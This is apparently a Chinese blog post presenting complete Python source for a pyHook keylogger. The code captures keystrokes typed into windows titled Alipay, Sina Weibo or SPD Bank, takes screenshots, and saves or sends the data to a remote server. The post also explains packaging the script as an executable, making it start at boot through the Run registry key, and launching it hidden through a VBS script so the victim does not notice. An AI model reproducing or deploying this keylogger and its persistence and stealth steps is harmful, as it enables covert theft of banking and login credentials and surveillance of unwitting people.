Python利用pyHook实现监听用户鼠标与键盘事件
程序员文章站
2022-06-03 09:30:20
本文以一段简单的监听鼠标、键盘事件的程序,实现获取用户的输入(比如登录某些网站的账号、密码)的功能。经测试,对于一台“裸奔”的电脑,完全能获取到用户输入的任何信息;但是如果...
本文以一段简单的监听鼠标、键盘事件的程序,实现获取用户的输入(比如登录某些网站的账号、密码)的功能。经测试,对于一台“裸奔”的电脑,完全能获取到用户输入的任何信息;但是如果安装了杀毒软件,就够呛了。具体实现方法如下:
一、代码部分:获取用户输入信息,并与截图一起保存到xx目录下
# -*- coding: utf-8 -*- # import pythoncom import pyhook import time import socket from pil import imagegrab # #如果是远程监听某个目标电脑,可以自己架设一个服务器,然后将获取到的信息发回给服务器 # def send_msg_to_server(msg): host="" port=1234 buf_size=1024 addr=(host,port) if len(msg)>0: tcp_client_sock=socket.socket(socket.af_inet,socket.sock_stream) tcp_client_sock.connect(addr) info=time.strftime('%y%m%d%h%m%s',time.localtime(time.time()))+' from '+socket.gethostname()+':' tcp_client_sock.sendall(info+msg) tcp_client_sock.close() # #也可以将获取到的信息保存到本地文件下 # def write_msg_to_txt(msg): f=open('d:/workspace/mytest/pyhook/media/monitor.txt','a') f.write(msg+'\r\n') f.close() def onmouseevent(event): # 监听鼠标事件 global msg if len(msg)!=0: #send_msg_to_server(msg) write_msg_to_txt(msg) msg='' pic_name = time.strftime('%y%m%d%h%m%s',time.localtime(time.time())) #将用户屏幕截图,保存到本地某个目录下(也可以搞成远程发送到自己的服务器) pic = imagegrab.grab() pic.save('d:/workspace/mytest/pyhook/media/mouse_%s.png' % pic_name) return true def onkeyboardevent(event): #监听键盘事件 global msg title= event.windowname.decode('gbk') #通过网站title,判断当前网站是否是“监听目标” if title.find(u"支付宝") != -1 or title.find(u'新浪微博')!=-1 or title.find(u'浦发银行')!=-1: #ascii: 8-backspace , 9-tab ,13-enter if (127 >= event.ascii > 31) or (event.ascii == 8): msg += chr(event.ascii) if (event.ascii == 9) or (event.ascii == 13): #send_msg_to_remote(msg) write_msg_to_txt(msg) msg = '' #屏幕抓图实现 pic_name = time.strftime('%y%m%d%h%m%s',time.localtime(time.time())) pic = imagegrab.grab() #保存成为以日期命名的图片 pic.save('d:/workspace/mytest/pyhook/media/keyboard_%s.png' % pic_name) return true if __name__ == "__main__": msg = '' #创建hook句柄 hm = pyhook.hookmanager() #监控鼠标 hm.subscribemouseleftdown(onmouseevent) hm.hookmouse() #监控键盘 hm.keydown = onkeyboardevent hm.hookkeyboard() #循环获取消息 pythoncom.pumpmessages()
二、用py2exe将脚本打包:
新建一个py文件setup.py,内容如下:
from distutils.core import setup import py2exe setup(console=["monitor.py"]) #setup(windows=["monitor.py"])
命令行执行以下命令:
pythonsetup.pypy2exe
三、将该程序设置为开机自动启动:
步骤①:
将需要开机启动的文件(创建一个快捷方式,然后)放到“开始/所有程序/启动”目录下
步骤②:
修改注册表:命令行— regedit ,然后到以下路径下:
[hkey_current_user\software\microsoft\windows\currentversion\run]
新建一个“字符串值”,然后编辑:设置exe文件所在路径
d:\workspace\mytest\pyhook\dist\monitor.exe
(以上两种方式启动monitor.exe的话,会弹出一个命令框,显示监听日志信息,这样的话,被监听的人一下就能发现了,可以试试下面这个方式)
步骤③:
新建一个 .vbs文件,内容如下:
setwscriptobj=createobject("wscript.shell") wscriptobj.run“d:\workspace\mytest\pyhook\dist\monitor.exe",0
双击运行该vbs文件,则monitor.exe就在后台启动了(不会弹出一个大黑框)。
然后参考法①、② 把该vbs设置成开机启动即可。
补充:
1、该程序涉及到一些模块都需要自己安装一下;
2、文章中凡是“d:\workspace....”这样的路径都需要改成自己的真实路径;
3、本代码仅为测试示例,读者不要将其用于非法用途。
感兴趣的读者可以对本文实例加以改进,使之功能更加完善。